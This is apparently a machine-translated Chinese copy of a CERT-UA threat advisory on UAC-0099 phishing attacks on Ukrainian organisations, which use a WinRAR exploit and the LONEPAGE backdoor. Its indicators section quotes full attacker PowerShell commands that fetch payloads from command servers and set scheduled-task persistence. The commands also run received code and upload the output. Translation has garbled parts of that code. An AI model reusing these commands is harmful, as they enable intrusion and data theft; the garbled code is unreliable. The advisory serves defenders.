2024年11月至12月期间,乌克兰CERT-UA政府计算机应急响应小组调查了UAC-0099组织针对一些国家组织,特别是林业、法医检查机构、工厂等发起的多起网络攻击。
带有 LNK 或 HTA 文件双存档形式附件的电子邮件传统上用于传递网络威胁。同时,某些存档可能包含针对已知 WinRAR 漏洞 CVE-2023-38831 的利用。
如果成功破解,则会在计算机上启动 LONEPAGE 程序,该程序实现命令执行功能。同时,应注意策略、技术和程序的变化:如果早期 LONEPAGE 以位于计算机目录之一的 VBS 文件的形式呈现,那么在 12 月,上述功能将在两个文件中实现:加密 (3DES) 文件和一个 .NET 程序,该程序的目的是解密该文件并在内存中运行生成的 PowerShell 代码。
很明显,UAC-0099的活动是为了间谍目的而进行的,并且感兴趣的对象列表以及实施恶意计划的手段正在发生变化。与此同时,攻击者继续使用Cloudflare来隐藏并确保基础设施的容错能力。
请注意,尽管有大量建议和材料可供利用,但尚未落实网络保护组织和技术能力的组织负责人,直接为侵犯国家信息资源机密性创造了条件。
IOCS
文件:
92cbb147159f3a6225a3580046591d37 6161be2016a1fd8096b6b43544eb5df97cd3fa73a820b5e0a44618389897d733 行为。违反乌克兰刑法第336条.rar b452c8eb4a4aee4978a10b1b9143d15f 16f809cd9fb1a06f07bb947ea8b6a27f66cfca0947e29666c34ae7b35b6e471b 行为。违反乌克兰刑法第336条.rar bd89dfb42612f5f7c9e28d81609aec8d d4eafc11cd0e4fe417c59db804ca6e8bd8bf9c0d0886627f15165937fcb68395 行为。违反乌克兰刑法第 336 条.hta 9ad38f58f3a7d039d8c540365e1e3421 eb08f96acba2b316408f66ef0c4f45a42eb207e43c605476405324726e97f9e3 update.win.app.com 19391b5bd1455864dfbfb91f3fe9fcb2 7a0ae128961a6239a2e10059305bb83fa64251bb3f0b44162ec6efdde10fd1e8 app.lib.conf(3DES 加密) 946ee0ca399acc84abfed9e41ab3cf80 5441cb26f32a433b0abd80dfa98a3a30c78df00ca9d2a0cfc5b20c55f3aaadce app.lib.conf.ps1(单页) b21d0df863af16c39348238409e8bd9d 025b9bdd156b59b18ab08921572501b6386ae45e8c0c0440855a719ae4b4c24a 316-1759-24.rar e55118b29430970476d743c3993a143e fbc4fbb3c2926300ee820ff7044f35231c2a1aeeb74d1f49a6caaec7736739c6 316-1759-24.rar 34c68108eb2e381112ae0dfaba0c80c3 88b64a3eb0dc38e3f8288b977b1cd67af7d4ba959297ac48ef5f06bec3e77560 316-1759-24.hta f73ab22c63de6bbc08a8ddc1edf11270 8cc89a917ed89a8407aa1e5caa4af585f26946124cf1764e3b178261a27177af 316-1759-24.rar 04833a30808fcc118eed6a748b95fada fa331a275d2f966f42a6168f1cb6fdb919d272b32175985c8bf383f2d800ced2 316-1759-24.hta eec19fca4cafc2980f077d934644578e 0af76e87614126042a2c3409d273d606a4562f99cb9f003a9f9ec0596213a35a 护照扫描.rar (CVE-2023-38831) 9b9552472a4e41df56662734be9d8ce0 0aaee2882e4a71b25de5722d8936c67d40355e2f79caf994c8e10164468d3272 护照扫描.jpg .lnk 4d086e04009690245bbfc6125e4edf42 0b16ee402ad04a673d61af43f461d475d1e3fcbdaf8714a1183ac35056bbae25 scan.txt(BASE64编码) c9735877c66597ed493e322bdb9bd30f 53f4e38d56946a385a681c66d891d3d70c2b2fee1691ff7e7af317955e0d8b88 UpdateOfficeCore.vbs (LONEPAGE) e5f6ea0297f0f4773697c1675f05fc12 322de3a4e1d356a7db22d6447807bd7576f91ed1910a57d9e8eb6f678ceb6ab4 UpdateOfficeCore.vbs (LONEPAGE) 5c935fbb11100a738b4451a8d85f192f 4a42bfc95772e2f6ae58ccb37fe74b5e810f6c2973ec7a70e09884e1fe97e794 UpdateOfficeCore.vbs(单页) fb0c754f91836abee965a99cde137fcb 25e725e4be880354c42c008e0960ee67481229b299ff61c29c48a23939d9a041 UpdateOfficeCore.vbs (LONEPAGE)
网络:
kiev.gp.vid2@ukr.net 45[.]61.157.118 hXXps://captcha-challenge[.]com/message/getsecretnumber hXXps://captcha-challenge[.]com/message/[0-9]{20}/message[0-9]+/ hXXps://captcha-challenge[.]com/message/message[0-9]+ 验证码挑战[.]com oksanakuli4@ukr.net gosp16.spd.ics.gov.ua@ukr.net hXXps://newyorktlimes[.]life/api/values/uid hXXps://newyorktlimes[.]life/api/values/view/skan.txt hXXps://newyorktlimes[.]life/api/values/[0-9]{20}/refresh[0-9]+/ hXXps://newyorktlimes[.]life/api/values/[0-9]{20}/[0-9]{20}/refresh[0-9]+/ hXXps://newyorktlimes[.]life/api/values/refresh[0-9]+ 纽约时代[.]生活 webappapiservice[.]life 160[.]119.251.83 172[.]86.117.53
主办方:
%PUBLIC%\Libraries\app.lib.conf %PUBLIC%\Libraries\update.win.app.com powershell.exe -w隐藏-nop -noni -exec绕过-c $w=new-object system.net.webclient;$w.Headers.Add('用户代理', '%USER-AGENT%');$a=$w.downloadstring('hXXps://captcha-challenge[.]com/Message/GetSecretNumber');[io.file]::WriteAllText('%PUBLIC%\库\app.lib.conf',$a);$uu='%BASE64-DATA%';$dd=[convert]::FromBase64String($uu);设置内容%PUBLIC%\Libraries\update.win.app.com -value $dd -encoding byte -force;schtasks.exe /create /TN 'Libraries\WinLibUpdateTask' /SC 分钟 /mo 4 /tr %PUBLIC%\Libraries\update .win.app.com /f; schtasks.exe /create /TN 'Libraries\WinLibUpdateTask' /SC 分钟 /mo 4 /tr %PUBLIC%\Libraries\update.win.app.com /f; 库\WinLibUpdateTask %PUBLIC%\Documents\UpdateOfficeCore.vbs %PUBLIC%\文档\firefox.exe %TMP%\skan_passportu.jpg %PUBLIC%\Documents\firefox.exe -executionpolicy 绕过 -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient ;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('hXXps://newyorktlimes[.]life/api/values/[0-9]{20}/[0-9]{20}/refresh[0- 9]+/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match '获取内容'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ ip)+[系统.环境]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-对象 net.webclient;start-sleep 16;$ujk.uploaddata('hXXps://newyorktlimes[.]life/api/values/refresh[0-9]+',$drpy);} powershell sleep 24;sleep (get-random -min 10 -max 60);sleep 13;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get -随机 -min 5 -max 15) |.foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('hXXps://webappapiservice[.]life/api/values/[0-9]{20}/refresh[0-9]+/'+$rc) ;if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine; $hbn=IEX $jkr;$bodo+=$hbn|输出字符串;[byte[]]$byt=[system.text.encoding]::Utf8.GetBytes($bodo);};sleep 22;睡眠 26;$cnterq=新对象 System.IO.MemoryStream;$cnterq.Write($byt 0 $byt.Length);$cnterq.Position=0;$ct='application/octet-stream';$ resp= Invoke-RestMethod -Uri hXXps://webappapiservice[.]life/api/values/refresh[0-9]+ -Method Post -Body $cnterq -ContentType $ct; } powershell.exe -w隐藏-nop -noni -exec绕过-c $w=new-object system.net.webclient;$d=$w.downloadstring('hXXps://newyorktlimes[.]life/api/values/查看/skan.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\skan_passportu.jpg', $dd);&$home\ appdata\local\temp\skan_passportu.jpg;$w.Headers.Add('用户代理', 'Ds26GOZNxbTxlJY');$a=$w.downloadstring('hXXps://newyorktlimes[.]life/api/values/uid');set-content %PUBLIC%\Documents\UpdateOfficeCore.vbs -value $a;schtasks .exe /create /TN ExplorerCoreUpdateTaskMachine /SC 分钟 /mo 3 /tr %PUBLIC%\Documents\UpdateOfficeCore.vbs /f; powershell.exe -w隐藏-nop -noni -exec绕过-c $w=新对象system.net.webclient;$w.Headers.Add('用户代理', 'Ds26GOZNxbTxlJY');$a=$w .downloaddata('hXXps://newyorktlimes[.]life/api/values/uid');$c=[System.Text.Encoding]::utf8.GetString($a);设置内容%PUBLIC%\Documents\UpdateOfficeCore.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC 分钟 /mo 3 /tr %PUBLIC%\Documents\UpdateOfficeCore.vbs /f; ExplorerCoreUpdateTaskMachine
图形图像
图 1 失败链示例(2024 年 11 月)
图 2 损害链示例(2024 年 12 月)
:Secret-Blizzard入侵Storm-0156基础设施以进行间谍活动-1-390x220.webp)
